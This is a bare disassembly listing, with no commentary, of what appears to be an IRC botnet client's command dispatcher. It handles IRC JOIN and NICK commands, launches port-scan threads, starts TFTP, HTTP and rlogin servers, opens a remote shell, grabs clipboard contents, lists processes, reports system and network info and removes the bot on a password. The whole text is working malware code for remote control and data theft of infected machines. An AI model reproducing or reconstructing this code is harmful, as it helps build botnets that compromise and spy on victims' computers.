jmp short loc_40B2C5
; ---------------------------------------------------------------------------
loc_40B289: ; CODE XREF: sub_4078FA+18BA�j
; sub_4078FA+18CE�j
push [ebp+ebx+var_9C]
push [ebp+var_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
push offset aMainJoinedCh_0 ; "[MAIN]: Joined channel: '%s'."
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40B2AD: ; CODE XREF: sub_4078FA+1892�j
; sub_4078FA+18A6�j
push [ebp+var_8]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
push offset aMainNickChange ; "[MAIN]: Nick changed to: '%s'."
loc_40B2C5: ; CODE XREF: sub_4078FA+3135�j
; sub_4078FA+3973�j ...
call sub_401CA7
loc_40B2CA: ; CODE XREF: sub_4078FA+319B�j
add esp, 14h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40B2D2: ; CODE XREF: sub_4078FA+1858�j
; sub_4078FA+186C�j
mov cl, byte_42A1B2
and [ebp+arg_0], 0
test cl, cl
mov edx, offset byte_42A1B2
jz loc_407B7B
mov eax, edx
loc_40B2EB: ; CODE XREF: sub_4078FA+39FA�j
inc [ebp+arg_0]
add eax, 0Bh
cmp byte ptr [eax], 0
jnz short loc_40B2EB
test cl, cl
jz loc_407B7B
mov [ebp+var_1C], edx
loc_40B301: ; CODE XREF: sub_4078FA+3CDE�j
push 9
call sub_4110DA
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 258h
jle short loc_40B351
push ecx
lea eax, [ebp+var_2E0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 20h
jmp loc_40B5CE
; ---------------------------------------------------------------------------
loc_40B351: ; CODE XREF: sub_4078FA+3A21�j
or [ebp+var_4C8], 0FFFFFFFFh
xor esi, esi
cmp dword_42A068, esi
mov [ebp+var_4CC], 0C8h
mov [ebp+var_4E0], 5
mov [ebp+var_4DC], esi
mov [ebp+arg_0], esi
jz short loc_40B3E4
mov edx, [ebp+var_1C]
add edx, 0FFFFFFF6h
mov edi, offset dword_42A068
loc_40B38A: ; CODE XREF: sub_4078FA+3ACC�j
mov esi, edx
lea eax, [edi-28h]
loc_40B38F: ; CODE XREF: sub_4078FA+3AB1�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40B3B3
test cl, cl
jz short loc_40B3AD
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40B3B3
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40B38F
loc_40B3AD: ; CODE XREF: sub_4078FA+3A9F�j
xor esi, esi
xor eax, eax
jmp short loc_40B3BA
; ---------------------------------------------------------------------------
loc_40B3B3: ; CODE XREF: sub_4078FA+3A9B�j
; sub_4078FA+3AA9�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
xor esi, esi
loc_40B3BA: ; CODE XREF: sub_4078FA+3AB7�j
cmp eax, esi
jz short loc_40B3CA
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], esi
jnz short loc_40B38A
jmp short loc_40B3E4
; ---------------------------------------------------------------------------
loc_40B3CA: ; CODE XREF: sub_4078FA+3AC2�j
mov eax, [ebp+arg_0]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42A068[ecx]
mov [ebp+var_4E4], ecx
mov [ebp+var_4C8], eax
loc_40B3E4: ; CODE XREF: sub_4078FA+3A83�j
; sub_4078FA+3ACE�j
cmp [ebp+var_4E4], esi
jz loc_40B5F5
push 10h
pop esi
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_4]
mov [ebp+var_A8], esi
call dword_433418 ; getsockname
mov al, [ebp+var_44B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_C4], eax
push [ebp+var_C4]
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_67C]
push eax
call sub_412C40
xor eax, eax
cmp [ebp+var_44B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_67C]
push eax
call sub_412C10
add esp, 14h
xor bl, bl
test esi, esi
jle short loc_40B48A
loc_40B46A: ; CODE XREF: sub_4078FA+3B8E�j
test eax, eax
jz short loc_40B48A
mov byte ptr [eax], 78h
lea eax, [ebp+var_67C]
push 30h
push eax
call sub_412C10
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, esi
jl short loc_40B46A
loc_40B48A: ; CODE XREF: sub_4078FA+3B6E�j
; sub_4078FA+3B72�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4E8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4C0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4BC], eax
mov ebx, 80h
lea eax, [ebp+var_5E8]
push ebx
push eax
mov [ebp+var_4B8], 1
call sub_412E0D
xor ecx, ecx
add esp, 0Ch
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 41FA76h
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40B4F2
push eax
lea eax, [ebp+var_568]
push ebx
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40B4F9
; ---------------------------------------------------------------------------
loc_40B4F2: ; CODE XREF: sub_4078FA+3BE3�j
and [ebp+var_568], 0
loc_40B4F9: ; CODE XREF: sub_4078FA+3BF6�j
xor esi, esi
cmp [ebp+var_4B8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40B50D
mov eax, offset aSequential ; "Sequential"
loc_40B50D: ; CODE XREF: sub_4078FA+3C0C�j
push [ebp+var_4CC]
lea ecx, [ebp+var_67C]
push [ebp+var_4DC]
push [ebp+var_4E0]
push [ebp+var_4E4]
push ecx
push eax
lea eax, [ebp+var_2E0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 9
push eax
call sub_410EEA
add esp, 2Ch
mov [ebp+var_4D8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_67C]
push eax
push offset sub_4018D1
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_4D8]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40B5EB
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40B5A0: ; CODE XREF: sub_4078FA+3CF9�j
cmp [ebp+var_C], esi
jnz short loc_40B5C1
push esi
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40B5C1: ; CODE XREF: sub_4078FA+3CA9�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
loc_40B5CE: ; CODE XREF: sub_4078FA+3A52�j
add [ebp+var_1C], 0Bh
mov eax, [ebp+var_1C]
cmp byte ptr [eax], 0
jnz loc_40B301
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40B5E3: ; CODE XREF: sub_4078FA+3CF7�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40B5EB: ; CODE XREF: sub_4078FA+3C89�j
cmp [ebp+var_4B4], esi
jz short loc_40B5E3
jmp short loc_40B5A0
; ---------------------------------------------------------------------------
loc_40B5F5: ; CODE XREF: sub_4078FA+3AF0�j
lea eax, [ebp+var_2E0]
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40CA03
; ---------------------------------------------------------------------------
loc_40B60D: ; CODE XREF: sub_4078FA+1830�j
; sub_4078FA+1844�j
push 5
call sub_4110DA
test eax, eax
pop ecx
jle short loc_40B631
push offset aTftpAlreadyRun ; "[TFTP]: Already running."
loc_40B61E: ; CODE XREF: sub_4078FA+4E26�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
xor edi, edi
jmp loc_40C8BE
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_4078FA+3D1D�j
mov eax, [ebp+ebx+var_A0]
xor edi, edi
cmp eax, edi
mov esi, 104h
jz short loc_40B656
push eax
lea eax, [ebp+var_74C]
push esi
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40B665
; ---------------------------------------------------------------------------
loc_40B656: ; CODE XREF: sub_4078FA+3D47�j
push esi
lea eax, [ebp+var_74C]
push eax
push edi
call ds:dword_41F010 ; GetModuleFileNameA
loc_40B665: ; CODE XREF: sub_4078FA+3D5A�j
mov ebx, [ebp+ebx+var_9C]
cmp ebx, edi
jnz short loc_40B675
mov ebx, offset byte_42AED0
loc_40B675: ; CODE XREF: sub_4078FA+3D74�j
push ebx
lea eax, [ebp+var_648]
push esi
push eax
call sub_412E0D
mov eax, dword_42AE44
mov [ebp+var_53C], eax
mov eax, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_750], eax
lea eax, [ebp+var_538]
push eax
mov [ebp+var_540], edi
call sub_412C40
mov eax, [ebp+var_4]
mov [ebp+var_4B8], eax
mov eax, [ebp+var_C]
mov [ebp+var_4B4], eax
lea eax, [ebp+var_648]
push eax
lea eax, [ebp+var_74C]
push eax
push [ebp+var_53C]
lea eax, [ebp+var_2E0]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 5
push eax
call sub_410EEA
add esp, 38h
mov [ebp+var_544], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_750]
push eax
push offset sub_410A22
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_544]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40B757
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aTftpFailedTo_0 ; "[TFTP]: Failed to start server thread, "...
loc_40B73B: ; CODE XREF: sub_4078FA+4F9C�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40C8C0
; ---------------------------------------------------------------------------
loc_40B74F: ; CODE XREF: sub_4078FA+3E63�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40B757: ; CODE XREF: sub_4078FA+3E33�j
cmp [ebp+var_4B0], edi
jz short loc_40B74F
jmp loc_40C8C0
; ---------------------------------------------------------------------------
loc_40B764: ; CODE XREF: sub_4078FA+1808�j
; sub_4078FA+181C�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40B783
push esi
call sub_412F42
test eax, eax
pop ecx
jz short loc_40B783
push esi
call sub_412F42
pop ecx
jmp short loc_40B788
; ---------------------------------------------------------------------------
loc_40B783: ; CODE XREF: sub_4078FA+3E73�j
; sub_4078FA+3E7E�j
mov eax, dword_42AE48
loc_40B788: ; CODE XREF: sub_4078FA+3E87�j
mov ebx, [ebp+ebx+var_9C]
mov [ebp+var_C24], eax
xor eax, eax
cmp [ebp+var_448], al
setz al
xor edi, edi
cmp ebx, edi
mov [ebp+var_C10], eax
jz short loc_40B7BD
lea eax, [ebp+var_D28]
push ebx
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_40B7E8
; ---------------------------------------------------------------------------
loc_40B7BD: ; CODE XREF: sub_4078FA+3EB0�j
push 104h
lea eax, [ebp+var_B74]
push eax
call ds:dword_41F040 ; GetSystemDirectoryA
push edi
push edi
push edi
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_B74]
push eax
call sub_4141AD
add esp, 14h
loc_40B7E8: ; CODE XREF: sub_4078FA+3EC1�j
lea eax, [ebp+var_D28]
lea edx, [eax+1]
loc_40B7F1: ; CODE XREF: sub_4078FA+3EFC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B7F1
sub eax, edx
cmp [ebp+eax+var_D29], 5Ch
jnz short loc_40B81D
lea eax, [ebp+var_D28]
lea edx, [eax+1]
loc_40B80D: ; CODE XREF: sub_4078FA+3F18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B80D
sub eax, edx
and [ebp+eax+var_D29], cl
loc_40B81D: ; CODE XREF: sub_4078FA+3F08�j
push [ebp+var_9C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_FB0]
push 80h
push eax
mov [ebp+var_FB4], esi
call sub_412E0D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_C14], eax
lea eax, [ebp+var_D28]
push eax
push [ebp+var_C24]
mov [ebp+var_C18], ebx
push esi
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 4
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_C1C], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_FB4]
push eax
push offset sub_403E06
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_C1C]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40B8D8
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedT_1 ; "[HTTPD]: Failed to start server thread,"...
jmp loc_40A005
; ---------------------------------------------------------------------------
loc_40B8D0: ; CODE XREF: sub_4078FA+3FE4�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40B8D8: ; CODE XREF: sub_4078FA+3FC3�j
cmp [ebp+var_C08], edi
jz short loc_40B8D0
jmp loc_40A014
; ---------------------------------------------------------------------------
loc_40B8E5: ; CODE XREF: sub_4078FA+17E0�j
; sub_4078FA+17F4�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40B904
push esi
call sub_412F42
test eax, eax
pop ecx
jz short loc_40B904
push esi
call sub_412F42
pop ecx
jmp short loc_40B909
; ---------------------------------------------------------------------------
loc_40B904: ; CODE XREF: sub_4078FA+3FF4�j
; sub_4078FA+3FFF�j
mov eax, dword_42AE4C
loc_40B909: ; CODE XREF: sub_4078FA+4008�j
mov [ebp+var_890], eax
mov eax, [ebp+ebx+var_9C]
xor edi, edi
cmp eax, edi
jnz short loc_40B922
lea eax, [ebp+var_E0]
loc_40B922: ; CODE XREF: sub_4078FA+4020�j
push eax
lea eax, [ebp+var_9D0]
push 40h
push eax
call sub_412E0D
mov ebx, [ebp+ebx+var_98]
add esp, 0Ch
cmp ebx, edi
jnz short loc_40B944
mov ebx, 41FA76h
loc_40B944: ; CODE XREF: sub_4078FA+4043�j
push ebx
lea eax, [ebp+var_990]
push 100h
push eax
call sub_412E0D
push [ebp+var_9C]
lea eax, [ebp+var_A50]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+var_C]
mov esi, [ebp+arg_4]
mov ebx, [ebp+var_4]
add esp, 18h
mov [ebp+var_87C], eax
lea eax, [ebp+var_9D0]
push eax
push [ebp+var_890]
mov [ebp+var_A54], esi
push esi
mov [ebp+var_880], ebx
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aRlogindServerL ; "[RLOGIND]: Server listening on IP: %s:%"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 7
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_88C], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_A54]
push eax
push offset sub_40E219
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_88C]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40BA11
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to start server threa"...
jmp loc_40A005
; ---------------------------------------------------------------------------
loc_40BA09: ; CODE XREF: sub_4078FA+411D�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40BA11: ; CODE XREF: sub_4078FA+40FC�j
cmp [ebp+var_878], edi
jz short loc_40BA09
jmp loc_40A014
; ---------------------------------------------------------------------------
loc_40BA1E: ; CODE XREF: sub_4078FA+17B8�j
; sub_4078FA+17CC�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40BA31
push ebx
call sub_412F42
jmp short loc_40BA38
; ---------------------------------------------------------------------------
loc_40BA31: ; CODE XREF: sub_4078FA+412D�j
push 9
call sub_4110F9
loc_40BA38: ; CODE XREF: sub_4078FA+4135�j
test eax, eax
pop ecx
jz loc_40CFE2
push eax
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4010CA
jmp loc_40BF27
; ---------------------------------------------------------------------------
loc_40BA58: ; CODE XREF: sub_4078FA+1790�j
; sub_4078FA+17A4�j
mov eax, dword_433584
test eax, eax
jz short loc_40BA7B
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_40BA74
push offset aFlushdnsDnsCac ; "[FLUSHDNS]: DNS cache flushed."
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BA74: ; CODE XREF: sub_4078FA+4171�j
push offset aFlushdnsFailed ; "[FLUSHDNS]: Failed to flush DNS cache."
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BA7B: ; CODE XREF: sub_4078FA+4165�j
push offset aFlushdnsFail_0 ; "[FLUSHDNS]: Failed to load dnsapi.dll."
lea eax, [ebp+var_2E0]
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BA88: ; CODE XREF: sub_4078FA+1768�j
; sub_4078FA+177C�j
call sub_406B55
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_40BAAC
push offset aFlushdnsArpC_0 ; "[FLUSHDNS]: ARP cache flushed."
loc_40BA9C: ; CODE XREF: sub_4078FA+4178�j
; sub_4078FA+417F�j ...
push 200h
push eax
call sub_412E0D
jmp loc_40C3B3
; ---------------------------------------------------------------------------
loc_40BAAC: ; CODE XREF: sub_4078FA+419B�j
push offset aFlushdnsFail_1 ; "[FLUSHDNS]: Failed to flush ARP cache."
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_4078FA+1740�j
; sub_4078FA+1754�j
cmp [ebp+var_C], 0
jnz short loc_40BAD4
push 0
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40BAD4: ; CODE XREF: sub_4078FA+41BD�j
push 0
push [ebp+var_4]
call sub_405792
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push offset aMainGetClipboa ; "[MAIN]: Get Clipboard."
jmp loc_40BDF0
; ---------------------------------------------------------------------------
loc_40BAF7: ; CODE XREF: sub_4078FA+13B1�j
; sub_4078FA+13C5�j
push 8
call sub_4110DA
test eax, eax
pop ecx
jle short loc_40BB0D
push offset aCmdRemoteShell ; "[CMD]: Remote shell already running."
jmp loc_40B1A8
; ---------------------------------------------------------------------------
loc_40BB0D: ; CODE XREF: sub_4078FA+4207�j
push [ebp+var_9C]
push [ebp+arg_4]
call sub_40DDC6
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_40BB2C
push offset aCmdCouldnTOpen ; "[CMD]: Couldn't open remote shell."
jmp loc_40B1A8
; ---------------------------------------------------------------------------
loc_40BB2C: ; CODE XREF: sub_4078FA+4226�j
push offset aCmdRemoteShe_0 ; "[CMD]: Remote shell ready."
jmp loc_40B1A8
; ---------------------------------------------------------------------------
loc_40BB36: ; CODE XREF: sub_4078FA+1389�j
; sub_4078FA+139D�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405277
jmp loc_40BE11
; ---------------------------------------------------------------------------
loc_40BB4F: ; CODE XREF: sub_4078FA+1361�j
; sub_4078FA+1375�j
push [ebp+ebx+var_A0]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_402717
jmp loc_40BE11
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_4078FA+1339�j
; sub_4078FA+134D�j
or esi, 0FFFFFFFFh
call ds:dword_41F004 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov edi, eax
jz short loc_40BB94
push ebx
call sub_412F42
pop ecx
mov esi, eax
loc_40BB94: ; CODE XREF: sub_4078FA+428F�j
xor edx, edx
mov eax, edi
mov ecx, 15180h
div ecx
cmp eax, esi
jnb short loc_40BBAC
cmp esi, 0FFFFFFFFh
jnz loc_40CFE2
loc_40BBAC: ; CODE XREF: sub_4078FA+42A7�j
push 0
call sub_40FD16
push eax
lea eax, [ebp+var_2E0]
push offset aMainUptimeS_ ; "[MAIN]: Uptime: %s."
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
loc_40BBEB: ; CODE XREF: sub_4078FA+2412�j
add esp, 28h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40BBF3: ; CODE XREF: sub_4078FA+1311�j
; sub_4078FA+1325�j
push 1Fh
call sub_4110DA
test eax, eax
pop ecx
jle short loc_40BC29
cmp [ebp+var_C], 0
jnz loc_407B7B
push 0
push [ebp+var_4]
push offset aProcAlreadyRun ; "[PROC]: Already running."
loc_40BC13: ; CODE XREF: sub_4078FA+1F21�j
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40BC29: ; CODE XREF: sub_4078FA+4303�j
push [ebp+var_9C]
lea eax, [ebp+var_440]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
and [ebp+var_3BC], 0
mov [ebp+var_444], eax
mov eax, [ebp+var_4]
mov [ebp+var_3B8], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_3B4], eax
jz short loc_40BC8A
push 5
mov edi, ebx
mov esi, offset aFull ; "full"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40BC8A
mov [ebp+var_3BC], 1
loc_40BC8A: ; CODE XREF: sub_4078FA+4374�j
; sub_4078FA+4384�j
lea eax, [ebp+var_2E0]
push offset aProcsProccessL ; "[PROCS]: Proccess list."
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 1Fh
push eax
call sub_410EEA
add esp, 14h
mov [ebp+var_3C0], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_444]
push eax
push offset sub_4073FB
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_3C0]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40BD0C
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aProcsFailedToS ; "[PROCS]: Failed to start listing thread"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40ABEA
; ---------------------------------------------------------------------------
loc_40BD04: ; CODE XREF: sub_4078FA+4418�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40BD0C: ; CODE XREF: sub_4078FA+43E8�j
cmp [ebp+var_3B0], esi
jz short loc_40BD04
jmp loc_40ABEA
; ---------------------------------------------------------------------------
loc_40BD19: ; CODE XREF: sub_4078FA+12E9�j
; sub_4078FA+12FD�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz loc_407B7B
mov esi, ebx
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40BD2F: ; CODE XREF: sub_4078FA+4451�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40BD51
test cl, cl
jz short loc_40BD4D
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40BD51
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40BD2F
loc_40BD4D: ; CODE XREF: sub_4078FA+443F�j
xor eax, eax
jmp short loc_40BD56
; ---------------------------------------------------------------------------
loc_40BD51: ; CODE XREF: sub_4078FA+443B�j
; sub_4078FA+4449�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40BD56: ; CODE XREF: sub_4078FA+4455�j
test eax, eax
jnz loc_407B7B
cmp [ebp+var_C], eax
jnz short loc_40BD7D
push eax
push [ebp+var_4]
push offset aMainRemovingBo ; "[MAIN]: Removing Bot."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40BD7D: ; CODE XREF: sub_4078FA+4467�j
push [ebp+arg_4]
call dword_4335AC ; closesocket
call dword_4335B8 ; WSACleanup
call sub_405915
jmp loc_40C4C6
; ---------------------------------------------------------------------------
loc_40BD96: ; CODE XREF: sub_4078FA+12C1�j
; sub_4078FA+12D5�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push [ebp+arg_4]
push eax
call sub_40FE1F
pop ecx
pop ecx
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push offset aMainSystemInfo ; "[MAIN]: System Info."
jmp short loc_40BDF0
; ---------------------------------------------------------------------------
loc_40BDC2: ; CODE XREF: sub_4078FA+1299�j
; sub_4078FA+12AD�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_410086
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push offset aMainNetworkInf ; "[MAIN]: Network Info."
loc_40BDF0: ; CODE XREF: sub_4078FA+41F8�j
; sub_4078FA+44C6�j
call sub_401C33
loc_40BDF5: ; CODE XREF: sub_4078FA+3006�j
add esp, 18h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40BDFD: ; CODE XREF: sub_4078FA+1271�j
; sub_4078FA+1285�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401CD3
loc_40BE11: ; CODE XREF: sub_4078FA+1E2�j
; sub_4078FA+4250�j ...
add esp, 10h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_4078FA+1249�j
; sub_4078FA+125D�j
and [ebp+var_B00], 0
cmp [ebp+var_14], 0
jz short loc_40BE5A
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40BE5A
push ebx
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40BE5A
push eax
push offset aS_1 ; "%s"
lea eax, [ebp+var_B00]
push 80h
push eax
call sub_412E0D
add esp, 10h
loc_40BE5A: ; CODE XREF: sub_4078FA+452A�j
; sub_4078FA+4535�j ...
push [ebp+var_9C]
lea eax, [ebp+var_B80]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov [ebp+var_B84], eax
mov eax, [ebp+var_4]
mov [ebp+var_A7C], eax
mov eax, [ebp+var_C]
mov [ebp+var_A78], eax
lea eax, [ebp+var_2E0]
push offset aLogListingLog_ ; "[LOG]: Listing log."
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 1Dh
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_A80], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_B84]
push eax
push offset sub_401D45
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_A80]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40BEFF
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aLogFailedToSta ; "[LOG]: Failed to start listing thread, "...
jmp loc_40D19B
; ---------------------------------------------------------------------------
loc_40BEF7: ; CODE XREF: sub_4078FA+460B�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40BEFF: ; CODE XREF: sub_4078FA+45EA�j
cmp [ebp+var_A74], esi
jz short loc_40BEF7
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40BF0C: ; CODE XREF: sub_4078FA+1221�j
; sub_4078FA+1235�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401BBB
push offset aMainAliasList_ ; "[MAIN]: Alias list."
call sub_401C33
loc_40BF27: ; CODE XREF: sub_4078FA+4159�j
add esp, 10h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40BF2F: ; CODE XREF: sub_4078FA+11F9�j
; sub_4078FA+120D�j
push [ebp+var_9C]
lea eax, [ebp+var_374]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
mov [ebp+var_378], eax
mov eax, [ebp+var_4]
mov [ebp+var_2EC], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_2E8], eax
jz short loc_40BF88
push 4
xor eax, eax
mov edi, offset aSub ; "sub"
mov esi, ebx
pop ecx
repe cmpsb
setz al
mov [ebp+var_2F0], eax
jmp short loc_40BF8F
; ---------------------------------------------------------------------------
loc_40BF88: ; CODE XREF: sub_4078FA+4673�j
and [ebp+var_2F0], 0
